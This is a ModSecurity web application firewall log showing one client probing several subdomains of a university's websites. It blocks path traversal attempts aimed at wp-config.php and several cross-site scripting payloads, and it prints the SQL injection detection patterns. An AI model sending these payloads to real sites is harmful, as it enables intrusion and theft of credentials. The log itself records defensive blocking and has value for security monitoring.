[Tue Aug 29 11:51:49.579538 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZcCo-f0AAAmQ-1gAAAAb"]
[Tue Aug 29 11:51:49.601055 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/error"] [unique_id "ZO15ZcCo-f0AAAmIbTEAAAAo"]
[Tue Aug 29 11:51:49.608479 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:quot;. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS_NAMES:quot;: quot;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/mahasiswa-prodi-informatika-universitas-langlangbuana-masuk-15-besar-nasional-program-bangkit-2022/"] [unique_id "ZO15ZcCo-f0AAAnZfFoAAAAG"]
[Tue Aug 29 11:51:50.688441 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAlUll8AAAA0"]
[Tue Aug 29 11:51:50.699023 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAnGkL0AAAAR"]
[Tue Aug 29 11:51:50.701887 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAmQ-1oAAAAb"]
[Tue Aug 29 11:51:50.704182 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAnd3BYAAAAI"]
[Tue Aug 29 11:51:50.732683 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAngCV8AAAAP"]
[Tue Aug 29 11:51:51.529730 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAnqj8gAAAAC"]
[Tue Aug 29 11:51:51.563699 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAnd3BoAAAAI"]
[Tue Aug 29 11:51:51.592613 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAmQ-18AAAAb"]
[Tue Aug 29 11:51:51.616497 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAn0GX0AAAAa"]
[Tue Aug 29 11:51:51.617595 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnIlkwAAAAV"]
[Tue Aug 29 11:51:51.635858 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAlUlmgAAAA0"]
[Tue Aug 29 11:51:51.635869 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnf3m8AAAAM"]
[Tue Aug 29 11:51:51.638601 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAmQ-2EAAAAb"]
[Tue Aug 29 11:51:51.657702 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAmQ-2IAAAAb"]
[Tue Aug 29 11:51:51.658918 2023] [:error] [pid 2555] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAn7xugAAAAB"]
[Tue Aug 29 11:51:52.582749 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15aMCo-f0AAAnqj88AAAAC"]
[Tue Aug 29 11:51:52.646424 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15aMCo-f0AAAlUlm4AAAA0"]
[Tue Aug 29 11:51:53.583875 2023] [:error] [pid 2555] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAn7xu8AAAAB"]
[Tue Aug 29 11:51:53.892154 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAn40w8AAAAW"]
[Tue Aug 29 11:51:53.904862 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAnh6NsAAAAS"]
[Tue Aug 29 11:51:53.914141 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAngCWMAAAAP"]
[Tue Aug 29 11:51:53.917153 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAlUlnIAAAA0"]
[Tue Aug 29 11:51:53.918514 2023] [:error] [pid 2555] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAn7xvAAAAAB"]
[Tue Aug 29 11:51:53.922585 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAn40xAAAAAW"]
[Tue Aug 29 11:51:53.928525 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAfWOJMAAAAL"]
